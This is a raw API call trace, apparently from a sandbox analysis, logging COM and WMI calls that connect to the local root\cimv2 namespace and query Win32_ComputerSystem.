	[0262.229] CoGetContextToken (in: pToken=0x5eade48 | out: pToken=0x5eade48) returned 0x0
	[0262.229] WbemDefPath:IUnknown:QueryInterface (in: This=0x626de40, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade30 | out: ppvObject=0x5eade30*=0x39b7b8) returned 0x0
	[0262.230] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x39b7b8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade38 | out: pCid=0x5eade38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.230] WbemDefPath:IUnknown:Release (This=0x39b7b8) returned 0x3
	[0262.230] CoGetContextToken (in: pToken=0x5eade40 | out: pToken=0x5eade40) returned 0x0
	[0262.230] WbemDefPath:IUnknown:AddRef (This=0x626de40) returned 0x4
	[0262.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x626de40, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadeb4 | out: ppvObject=0x5eadeb4*=0x0) returned 0x80004002
	[0262.230] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x3
	[0262.230] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x2
	[0262.231] WbemDefPath:IUnknown:Release (This=0x626cb70) returned 0x0
	[0262.231] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x1
	[0262.231] CoGetContextToken (in: pToken=0x5eae6f0 | out: pToken=0x5eae6f0) returned 0x0
	[0262.231] CoGetContextToken (in: pToken=0x5eae6b0 | out: pToken=0x5eae6b0) returned 0x0
	[0262.231] WbemDefPath:IUnknown:AddRef (This=0x626de40) returned 0x2
	[0262.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x626de40, riid=0x5eae72c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae728 | out: ppvObject=0x5eae728*=0x626de40) returned 0x0
	[0262.231] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x2
	[0262.231] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x1
	[0262.231] CoGetContextToken (in: pToken=0x5eae770 | out: pToken=0x5eae770) returned 0x0
	[0262.231] CoGetContextToken (in: pToken=0x5eae730 | out: pToken=0x5eae730) returned 0x0
	[0262.231] WbemDefPath:IUnknown:AddRef (This=0x626de40) returned 0x2
	[0262.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x626de40, riid=0x5eae7ac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae7a8 | out: ppvObject=0x5eae7a8*=0x626de40) returned 0x0
	[0262.232] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x2
	[0262.232] WbemDefPath:IUnknown:AddRef (This=0x626de40) returned 0x3
	[0262.232] WbemDefPath:IWbemPath:SetText (This=0x626de40, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.232] WbemDefPath:IUnknown:Release (This=0x626de40) returned 0x2
	[0262.232] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae914 | out: puCount=0x5eae914*=0x2) returned 0x0
	[0262.232] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae910*=0x0, pszText=0x0 | out: puBuffLength=0x5eae910*=0x17, pszText=0x0) returned 0x0
	[0262.232] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae910*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae910*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.232] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae910 | out: puCount=0x5eae910*=0x2) returned 0x0
	[0262.232] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae90c*=0x0, pszText=0x0 | out: puBuffLength=0x5eae90c*=0x17, pszText=0x0) returned 0x0
	[0262.232] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae90c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae90c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.232] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae88c | out: ppv=0x5eae88c*=0x2d8dec) returned 0x0
	[0262.232] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae884 | out: pAptType=0x5eae884*=1) returned 0x0
	[0262.233] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae888 | out: ppvObject=0x5eae888*=0x0) returned 0x80004002
	[0262.233] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0262.233] CoGetClassObject (in: rclsid=0x382364*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae6dc | out: ppv=0x5eae6dc*=0x626dae8) returned 0x0
	[0262.233] WbemLocator:IUnknown:QueryInterface (in: This=0x626dae8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae50c | out: ppvObject=0x5eae50c*=0x0) returned 0x80004002
	[0262.233] WbemLocator:IClassFactory:CreateInstance (in: This=0x626dae8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x626cb70) returned 0x0
	[0262.233] WbemLocator:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2e8 | out: ppvObject=0x5eae2e8*=0x626cb70) returned 0x0
	[0262.234] WbemLocator:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eae2a4 | out: ppvObject=0x5eae2a4*=0x0) returned 0x80004002
	[0262.234] WbemLocator:IUnknown:AddRef (This=0x626cb70) returned 0x3
	[0262.234] CoGetContextToken (in: pToken=0x5eae130 | out: pToken=0x5eae130) returned 0x0
	[0262.234] WbemLocator:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae118 | out: ppvObject=0x5eae118*=0x0) returned 0x80004002
	[0262.234] CoGetContextToken (in: pToken=0x5eae128 | out: pToken=0x5eae128) returned 0x0
	[0262.234] WbemLocator:IUnknown:AddRef (This=0x626cb70) returned 0x4
	[0262.234] WbemLocator:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae19c | out: ppvObject=0x5eae19c*=0x0) returned 0x80004002
	[0262.235] WbemLocator:IUnknown:Release (This=0x626cb70) returned 0x3
	[0262.235] WbemLocator:IUnknown:Release (This=0x626cb70) returned 0x2
	[0262.235] WbemLocator:IUnknown:Release (This=0x626dae8) returned 0x0
	[0262.235] WbemLocator:IUnknown:Release (This=0x626cb70) returned 0x1
	[0262.235] CoGetContextToken (in: pToken=0x5eae634 | out: pToken=0x5eae634) returned 0x0
	[0262.235] CoGetContextToken (in: pToken=0x5eae5f4 | out: pToken=0x5eae5f4) returned 0x0
	[0262.235] WbemLocator:IUnknown:AddRef (This=0x626cb70) returned 0x2
	[0262.235] WbemLocator:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x5eae670*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eae66c | out: ppvObject=0x5eae66c*=0x626cb70) returned 0x0
	[0262.235] WbemLocator:IUnknown:Release (This=0x626cb70) returned 0x2
	[0262.236] WbemLocator:IUnknown:Release (This=0x626cb70) returned 0x1
	[0262.236] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae864 | out: puCount=0x5eae864*=0x2) returned 0x0
	[0262.236] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=8, puBuffLength=0x5eae860*=0x0, pszText=0x0 | out: puBuffLength=0x5eae860*=0x17, pszText=0x0) returned 0x0
	[0262.236] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=8, puBuffLength=0x5eae860*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae860*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.236] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5eae33c | out: ppv=0x5eae33c*=0x626dee8) returned 0x0
	[0262.236] WbemLocator:IWbemLocator:ConnectServer (in: This=0x626dee8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5eae388 | out: ppNamespace=0x5eae388*=0x6271fac) returned 0x0
	[0262.372] WbemLocator:IUnknown:QueryInterface (in: This=0x6271fac, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae258 | out: ppvObject=0x5eae258*=0x3b9fcc) returned 0x0
	[0262.372] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3b9fcc, pProxy=0x6271fac, pAuthnSvc=0x5eae2a0, pAuthzSvc=0x5eae29c, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4, pImpLevel=0x5eae290, pAuthInfo=0x5eae294, pCapabilites=0x5eae298 | out: pAuthnSvc=0x5eae2a0*=0xa, pAuthzSvc=0x5eae29c*=0x0, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4*=0x6, pImpLevel=0x5eae290*=0x2, pAuthInfo=0x5eae294, pCapabilites=0x5eae298*=0x1) returned 0x0
	[0262.372] WbemLocator:IUnknown:Release (This=0x3b9fcc) returned 0x1
	[0262.372] WbemLocator:IUnknown:QueryInterface (in: This=0x6271fac, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae24c | out: ppvObject=0x5eae24c*=0x3b9fec) returned 0x0
	[0262.372] WbemLocator:IUnknown:QueryInterface (in: This=0x6271fac, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae248 | out: ppvObject=0x5eae248*=0x3b9fcc) returned 0x0
	[0262.372] WbemLocator:IClientSecurity:SetBlanket (This=0x3b9fcc, pProxy=0x6271fac, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.372] WbemLocator:IUnknown:Release (This=0x3b9fcc) returned 0x2
	[0262.372] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x1
	[0262.372] CoTaskMemFree (pv=0x3ace40) 
	[0262.373] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x0
	[0262.373] WbemLocator:IUnknown:QueryInterface (in: This=0x6271fac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc08 | out: ppvObject=0x5eadc08*=0x3b9fec) returned 0x0
	[0262.373] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadbc4 | out: ppvObject=0x5eadbc4*=0x0) returned 0x80004002
	[0262.375] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x0) returned 0x80004002
	[0262.376] WbemLocator:IUnknown:AddRef (This=0x3b9fec) returned 0x3
	[0262.376] CoGetContextToken (in: pToken=0x5eada50 | out: pToken=0x5eada50) returned 0x0
	[0262.377] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eada38 | out: ppvObject=0x5eada38*=0x3b9f4c) returned 0x0
	[0262.377] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3b9f4c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eada40 | out: pCid=0x5eada40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.377] WbemLocator:IUnknown:Release (This=0x3b9f4c) returned 0x3
	[0262.377] CoGetContextToken (in: pToken=0x5eada48 | out: pToken=0x5eada48) returned 0x0
	[0262.377] WbemLocator:IUnknown:AddRef (This=0x3b9fec) returned 0x4
	[0262.377] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadabc | out: ppvObject=0x5eadabc*=0x3b9fd4) returned 0x0
	[0262.377] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x4
	[0262.378] WbemLocator:IRpcOptions:Query (in: This=0x3b9fd4, pPrx=0x3b9fec, dwProperty=2, pdwValue=0x5eadae0 | out: pdwValue=0x5eadae0) returned 0x80004002
	[0262.378] WbemLocator:IUnknown:Release (This=0x3b9fd4) returned 0x3
	[0262.378] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x2
	[0262.378] CoGetContextToken (in: pToken=0x5eadebc | out: pToken=0x5eadebc) returned 0x0
	[0262.378] CoGetContextToken (in: pToken=0x5eade7c | out: pToken=0x5eade7c) returned 0x0
	[0262.378] WbemLocator:IUnknown:AddRef (This=0x3b9fec) returned 0x3
	[0262.378] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x5eadef8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eadef4 | out: ppvObject=0x5eadef4*=0x6271fac) returned 0x0
	[0262.378] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x3
	[0262.378] WbemLocator:IUnknown:Release (This=0x6271fac) returned 0x2
	[0262.379] WbemLocator:IUnknown:Release (This=0x6271fac) returned 0x1
	[0262.379] CoGetContextToken (in: pToken=0x5eae7d8 | out: pToken=0x5eae7d8) returned 0x0
	[0262.379] WbemLocator:IUnknown:AddRef (This=0x3b9fec) returned 0x2
	[0262.379] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae3fc | out: ppvObject=0x5eae3fc*=0x3b9fec) returned 0x0
	[0262.379] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x2
	[0262.379] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x1
	[0262.379] CoGetContextToken (in: pToken=0x5eadfdc | out: pToken=0x5eadfdc) returned 0x0
	[0262.379] CoGetContextToken (in: pToken=0x5eadf9c | out: pToken=0x5eadf9c) returned 0x0
	[0262.379] WbemLocator:IUnknown:AddRef (This=0x3b9fec) returned 0x2
	[0262.380] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9fec, riid=0x5eae018*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eae014 | out: ppvObject=0x5eae014*=0x6271fac) returned 0x0
	[0262.380] WbemLocator:IUnknown:Release (This=0x3b9fec) returned 0x2
	[0262.380] WbemLocator:IUnknown:AddRef (This=0x6271fac) returned 0x3
	[0262.380] IWbemServices:ExecQuery (in: This=0x6271fac, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5eae620 | out: ppEnum=0x5eae620*=0x627204c) returned 0x0
	[0262.392] IUnknown:QueryInterface (in: This=0x627204c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2cc | out: ppvObject=0x5eae2cc*=0x6272050) returned 0x0
	[0262.392] IClientSecurity:QueryBlanket (in: This=0x6272050, pProxy=0x627204c, pAuthnSvc=0x5eae314, pAuthzSvc=0x5eae310, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318, pImpLevel=0x5eae304, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c | out: pAuthnSvc=0x5eae314*=0xa, pAuthzSvc=0x5eae310*=0x0, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318*=0x6, pImpLevel=0x5eae304*=0x2, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c*=0x1) returned 0x0
	[0262.392] IUnknown:Release (This=0x6272050) returned 0x1
	[0262.392] IUnknown:QueryInterface (in: This=0x627204c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2c0 | out: ppvObject=0x5eae2c0*=0x3b9efc) returned 0x0
	[0262.392] IUnknown:QueryInterface (in: This=0x627204c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2bc | out: ppvObject=0x5eae2bc*=0x6272050) returned 0x0
	[0262.392] IClientSecurity:SetBlanket (This=0x6272050, pProxy=0x627204c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.402] IUnknown:Release (This=0x6272050) returned 0x2
	[0262.402] WbemLocator:IUnknown:Release (This=0x3b9efc) returned 0x1
	[0262.402] CoTaskMemFree (pv=0x3acde0) 
	[0262.402] WbemLocator:IUnknown:Release (This=0x6271fac) returned 0x2
	[0262.402] IUnknown:QueryInterface (in: This=0x627204c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc78 | out: ppvObject=0x5eadc78*=0x3b9efc) returned 0x0
	[0262.403] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9efc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc34 | out: ppvObject=0x5eadc34*=0x0) returned 0x80004002
	[0262.405] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9efc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb28 | out: ppvObject=0x5eadb28*=0x0) returned 0x80004002
	[0262.406] WbemLocator:IUnknown:AddRef (This=0x3b9efc) returned 0x3
	[0262.406] CoGetContextToken (in: pToken=0x5eadac0 | out: pToken=0x5eadac0) returned 0x0
	[0262.406] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9efc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadaa8 | out: ppvObject=0x5eadaa8*=0x3b9e5c) returned 0x0
	[0262.406] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3b9e5c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadab0 | out: pCid=0x5eadab0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.406] WbemLocator:IUnknown:Release (This=0x3b9e5c) returned 0x3
	[0262.407] CoGetContextToken (in: pToken=0x5eadab8 | out: pToken=0x5eadab8) returned 0x0
	[0262.407] WbemLocator:IUnknown:AddRef (This=0x3b9efc) returned 0x4
	[0262.407] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9efc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb2c | out: ppvObject=0x5eadb2c*=0x3b9ee4) returned 0x0
	[0262.407] WbemLocator:IUnknown:Release (This=0x3b9efc) returned 0x4
	[0262.407] WbemLocator:IRpcOptions:Query (in: This=0x3b9ee4, pPrx=0x3b9efc, dwProperty=2, pdwValue=0x5eadb50 | out: pdwValue=0x5eadb50) returned 0x80004002
	[0262.407] WbemLocator:IUnknown:Release (This=0x3b9ee4) returned 0x3
	[0262.407] WbemLocator:IUnknown:Release (This=0x3b9efc) returned 0x2
	[0262.407] CoGetContextToken (in: pToken=0x5eadf2c | out: pToken=0x5eadf2c) returned 0x0
	[0262.407] CoGetContextToken (in: pToken=0x5eadeec | out: pToken=0x5eadeec) returned 0x0
	[0262.407] WbemLocator:IUnknown:AddRef (This=0x3b9efc) returned 0x3
	[0262.407] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9efc, riid=0x5eadf68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eadf64 | out: ppvObject=0x5eadf64*=0x627204c) returned 0x0
	[0262.408] WbemLocator:IUnknown:Release (This=0x3b9efc) returned 0x3
	[0262.408] IUnknown:Release (This=0x627204c) returned 0x2
	[0262.408] IUnknown:Release (This=0x627204c) returned 0x1
	[0262.408] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae8b8 | out: puCount=0x5eae8b8*=0x2) returned 0x0
	[0262.409] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae8b4*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8b4*=0x17, pszText=0x0) returned 0x0
	[0262.409] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae8b4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8b4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.409] CoGetContextToken (in: pToken=0x5eae254 | out: pToken=0x5eae254) returned 0x0
	[0262.409] CoGetContextToken (in: pToken=0x5eae214 | out: pToken=0x5eae214) returned 0x0
	[0262.409] WbemLocator:IUnknown:AddRef (This=0x3b9efc) returned 0x2
	[0262.409] WbemLocator:IUnknown:QueryInterface (in: This=0x3b9efc, riid=0x5eae290*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae28c | out: ppvObject=0x5eae28c*=0x627204c) returned 0x0
	[0262.409] WbemLocator:IUnknown:Release (This=0x3b9efc) returned 0x2
	[0262.409] IUnknown:AddRef (This=0x627204c) returned 0x3
	[0262.409] IEnumWbemClassObject:Clone (in: This=0x627204c, ppEnum=0x5eae888 | out: ppEnum=0x5eae888*=0x6272114) returned 0x0
	[0262.414] IUnknown:QueryInterface (in: This=0x6272114, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x6272118) returned 0x0
